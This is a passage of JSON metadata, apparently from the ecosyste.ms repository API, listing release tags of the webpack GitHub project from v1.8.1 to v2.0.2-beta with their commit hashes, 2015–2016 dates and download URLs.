job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/t